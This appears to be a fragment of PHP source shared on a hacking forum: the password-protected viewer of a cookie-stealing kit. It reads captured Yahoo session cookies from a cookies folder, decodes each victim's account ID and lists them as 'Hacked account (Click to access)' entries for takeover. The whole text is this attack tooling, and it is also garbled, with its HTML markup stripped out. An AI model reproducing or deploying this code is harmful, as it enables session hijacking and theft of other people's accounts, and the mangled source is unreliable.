www.hackforums.net
SCIFIX AT YOUR SERVICE --sharing is learning--



document.cookie ='pass=; path=/'"; echo ""; } if(isset($_POST["pass"])) { echo ""; echo ""; } if($_COOKIE['pass'] != $pass) { echo '

Hacked account (Click to access)

Date

Delete

Enter the password (I hope javascript is on):

' . ' ' . '
'; exit(0); } if($_GET['del']) { @unlink("./cookies/".$_GET['del']); } if ($handle = opendir('./cookies/')) { while ($file = readdir($handle)) { if ($file != "." && $file != ".." && $file != "index.html") { $fcookie = "./cookies/".$file; $fh = fopen($fcookie, 'r'); $cookie = fread($fh, filesize($fcookie)); $T = explode("T=", $cookie); $T = $T[1]; $T = explode(";", $T); $T = $T[0]; $Y = explode("Y=", $cookie); $Y = $Y[1]; $Y = explode(";", $Y); $Y = $Y[0]; $yid = explode("l=", $Y); $yid = $yid[1]; $yid = explode("/o", $yid); $yid = $yid[0]; $str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@"; $str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@"; $id = ""; for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})}; $p = substr($Y, strpos($Y, "p=") + 2, 7); $date = date ("M d Y H:i:s", filemtime("./cookies/".$file)); $lang = explode("lg=", $Y); $lang = $lang[1]; $lang = explode("&", $lang); $lang = $lang[0]; $sr = array(array(";", "&", "="), array(null, "%26", "%3D")); $y = "Y%3D" . str_replace($sr[0], $sr[1], $Y); $t = "T%3D" . str_replace($sr[0], $sr[1], $T); echo " ".$id.""; echo $date.""; echo "Delete it"; } } closedir($handle); } ?>